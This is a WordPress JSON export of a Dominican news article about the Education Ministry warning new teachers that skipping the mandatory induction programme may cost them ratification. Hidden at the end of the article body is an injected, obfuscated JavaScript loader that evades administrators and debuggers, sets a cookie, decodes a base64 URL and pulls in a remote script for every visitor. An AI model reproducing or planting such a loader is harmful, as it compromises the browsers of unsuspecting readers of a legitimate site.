{"id":13392,"date":"2023-01-17T07:44:41","date_gmt":"2023-01-17T11:44:41","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13392"},"modified":"2023-01-17T07:44:41","modified_gmt":"2023-01-17T11:44:41","slug":"minerd-advierte-maestros-que-no-iniciaron-programa-induccion-corren-el-riesgo-de-no-ser-ratificados-en-sus-puestos","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13392","title":{"rendered":"MINERD advierte maestros que no iniciaron programa inducci\u00f3n corren el riesgo de no ser ratificados en sus puestos"},"content":{"rendered":"<p>Santo Domingo.-\u00a0<strong>El Ministerio de Educaci\u00f3n de la Rep\u00fablica Dominicana (MINERD)<\/strong>\u00a0advirti\u00f3 a los maestros que ingresan al servicio p\u00fablico v\u00eda el\u00a0<strong>Concurso de Oposici\u00f3n Docente\u00a0<\/strong>que, de\u00a0<strong>no cumplir con el Programa de Inducci\u00f3n, corren el riesgo de no ser ratificados en sus puestos,<\/strong>\u00a0ya que el mismo est\u00e1 reglamentado por seis fundamentos legales.<\/p>\n<p><strong>Frank D\u00b4\u00d3leo, viceministro de Acreditaci\u00f3n y Certificaci\u00f3n Docente<\/strong>, hablando a nombre de la\u00a0<strong>Comisi\u00f3n Nacional Coordinadora\u00a0<\/strong>del Programa Nacional de Inducci\u00f3n, se\u00f1al\u00f3 que el programa es de\u00a0<strong>car\u00e1cter obligatorio<\/strong>\u00a0y est\u00e1 en conformidad con los siguientes fundamentos legales:\u00a0<strong>Ley General de Educaci\u00f3n No. 66-97, en su art\u00edculo 137; Reglamento del Estatuto Docente, en los art\u00edculos 29 y 42; Ley de Funci\u00f3n P\u00fablica 41-08, la Resoluci\u00f3n 11-2022, el Pacto Nacional para la Reforma Educativa y la Ley Org\u00e1nica Estrategia Nacional de Desarrollo 20-30.<\/strong><\/p>\n<p>El viceministro record\u00f3 el car\u00e1cter obligatorio de la participaci\u00f3n en la inducci\u00f3n y advirti\u00f3 a quienes no participaron en el inicio del proceso el pasado s\u00e1bado que\u00a0<strong>aquellos que no lo hagan se estar\u00edan colocando al margen de la Ley.<\/strong><\/p>\n<p>Asimismo,\u00a0<strong>deplor\u00f3 la actitud por la ADP frente al Programa de Inducci\u00f3n<\/strong>\u00a0y record\u00f3 que a\u00fan\u00a0<strong>la Comisi\u00f3n Nacional Coordinadora espera que el gremio env\u00ede sus sugerencias, ideas y aportes al mismo<\/strong>, como se comprometi\u00f3 durante reuni\u00f3n sostenida a las 11:00 de la ma\u00f1ana del 15 de noviembre del pasado a\u00f1o con la comisi\u00f3n designada por su presidente, Eduardo Hidalgo, e integrada por Tom\u00e1s Pichardo Mart\u00ednez, Miguel \u00c1ngel Fern\u00e1ndez, G\u00e9nesis Santos y Juan Valdez.<\/p>\n<p><strong>\u00c9xito del proceso<\/strong><\/p>\n<p>El viceministro destac\u00f3 el\u00a0<strong>rotundo \u00e9xito<\/strong>\u00a0del arranque del programa con una participaci\u00f3n de\u00a0<strong>15,750 nuevos docentes, que representa un 69 % del total,<\/strong>\u00a0a trav\u00e9s de las plataformas virtuales. Resalt\u00f3 que registraron 40,500 visualizaciones al acto de apertura del ciclo formativo y el\u00a0<strong>91 %<\/strong>\u00a0de los docentes\u00a0<strong>lo calificaron como bueno y excelente.<\/strong><\/p>\n<p>Subray\u00f3 que el proceso de formaci\u00f3n pedag\u00f3gico,\u00a0<strong>bajo el liderazgo del Instituto Superior de Formaci\u00f3n Docente Salom\u00e9 Ure\u00f1a (ISFODOSU),<\/strong>\u00a0es compartido con\u00a0<strong>19 instituciones de Educaci\u00f3n Superior\u00a0<\/strong>del pa\u00eds que cuentan conun\u00a0<strong>prestigio y calificaci\u00f3n profesional.<\/strong><\/p>\n<p>Record\u00f3 que el programa incluye formaci\u00f3n a trav\u00e9s de\u00a0<strong>m\u00f3dulos por las universidades<\/strong>, que pueden ser s\u00e1bado o domingo o d\u00eda de semana en la tarde despu\u00e9s de jornada escolar.<\/p>\n<p>Destac\u00f3 que, a fin de evitar la p\u00e9rdida de clase para cumplir con el calendario escolar, han reiterado\u00a0<strong>la labor del tutor en la pr\u00e1ctica del aula<\/strong>, en su horario laboral y en su centro educativo,\u00a0<strong>y no tendr\u00e1 que buscar sustituto ni pagarlo.<\/strong><\/p>\n<p>Asimismo, apunt\u00f3 que la\u00a0<strong>metodolog\u00eda del proceso es h\u00edbrida<\/strong>, con un mayor peso de virtualidad que lo presencial en los 5 m\u00f3dulos del programa. As\u00ed mismo, el\u00a0<strong>seguimiento metodol\u00f3gico<\/strong>\u00a0a los docentes de nuevo ingreso, por aproximadamente 4,000 tutores,\u00a0<strong>se ofrecer\u00e1 totalmente en las aulas<\/strong>, con el prop\u00f3sito de observar en la pr\u00e1ctica todo el proceso de su gesti\u00f3n y ofrecerles\u00a0<strong>orientaci\u00f3n en materia curricular, de planificaci\u00f3n, gesti\u00f3n de aula y evaluaci\u00f3n.<\/strong><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.-\u00a0El Ministerio de Educaci\u00f3n de la Rep\u00fablica Dominicana (MINERD)\u00a0advirti\u00f3 a los maestros que ingresan al servicio p\u00fablico v\u00eda el\u00a0Concurso de Oposici\u00f3n Docente\u00a0que, de\u00a0no cumplir con el Programa de Inducci\u00f3n, corren el riesgo de no ser ratificados en sus puestos,\u00a0ya que el mismo est\u00e1 reglamentado por seis fundamentos legales. Frank D\u00b4\u00d3leo, viceministro de Acreditaci\u00f3n y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13394,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13392","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13392","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13392"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13392\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13394"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13392"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13392"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}